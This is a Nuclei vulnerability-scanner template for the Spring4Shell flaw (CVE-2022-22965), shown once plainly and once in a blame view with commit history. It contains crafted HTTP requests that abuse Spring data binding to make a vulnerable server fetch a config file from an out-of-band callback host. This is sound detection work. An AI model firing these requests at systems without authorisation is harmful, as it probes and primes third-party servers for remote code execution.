nuclei-templates/cves/2022/CVE-2022-22965.yaml

id: CVE-2022-22965

info:
  name: Spring Framework - Remote Code Execution
  author: justmumu,arall,dhiyaneshDK,akincibor
  severity: critical
  description: |
    A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
  reference:
    - https://tanzu.vmware.com/security/cve-2022-22965
    - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
    - https://twitter.com/RandoriAttack/status/1509298490106593283
    - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
    - https://twitter.com/_0xf4n9x_/status/1509935429365100546
    - https://nvd.nist.gov/vuln/detail/cve-2022-22965
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22965
    cwe-id: CWE-94
  tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev

requests:
  - raw:
      - |
        POST {{BaseURL}} HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx

      - |
        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1

    payloads:
      interact_protocol:
        - http
        - https

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
        case-insensitive: true
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`id: CVE-2022-22965`

			`info:`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`name: Spring Framework - Remote Code Execution`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`author: justmumu,arall,dhiyaneshDK,akincibor`
			`severity: critical`
Update CVE-2022-22965.yaml 2022-08-11 07:04:38 +00:00			`description: \|`
			`A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`reference:`
			`- https://tanzu.vmware.com/security/cve-2022-22965`
			`- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/`
			`- https://twitter.com/RandoriAttack/status/1509298490106593283`
Updated intrusive detection with HTTP OOB interaction (#4028) 2022-04-04 14:28:38 +00:00			`- https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw`
			`- https://twitter.com/_0xf4n9x_/status/1509935429365100546`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`- https://nvd.nist.gov/vuln/detail/cve-2022-22965`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`cvss-score: 9.8`
			`cve-id: CVE-2022-22965`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cwe-id: CWE-94`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00
			`requests:`
Updated CVE-2022-22965.yaml 2022-08-09 02:58:38 +00:00			`- raw:`
			`- \|`
			`POST {{BaseURL}} HTTP/1.1`
			`Content-Type: application/x-www-form-urlencoded`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00
Updated CVE-2022-22965.yaml 2022-08-09 02:58:38 +00:00			`class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx`
Added POST method support to CVE-2022-22965 detection 2022-04-05 17:08:34 +00:00
Updated CVE-2022-22965.yaml 2022-08-09 02:58:38 +00:00			`- \|`
			`GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1`
Update CVE-2022-22965.yaml 2022-08-11 07:04:38 +00:00
Updated CVE-2022-22965.yaml 2022-08-09 02:58:38 +00:00			`payloads:`
			`interact_protocol:`
			`- http`
			`- https`
Added POST method support to CVE-2022-22965 detection 2022-04-05 17:08:34 +00:00
Updated intrusive detection with HTTP OOB interaction (#4028) 2022-04-04 14:28:38 +00:00			`matchers-condition: and`
Added CVE-2022-22965 - Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) (#4024) 2022-04-01 11:43:45 +00:00			`matchers:`
Updated intrusive detection with HTTP OOB interaction (#4028) 2022-04-04 14:28:38 +00:00			`- type: word`
			`part: interactsh_protocol # Confirms the HTTP Interaction`
			`words:`
			`- "http"`

			`- type: word`
			`part: interactsh_request`
			`words:`
			`- "User-Agent: Java"`
Update CVE-2022-22965.yaml 2022-08-11 07:04:38 +00:00			`case-insensitive: true`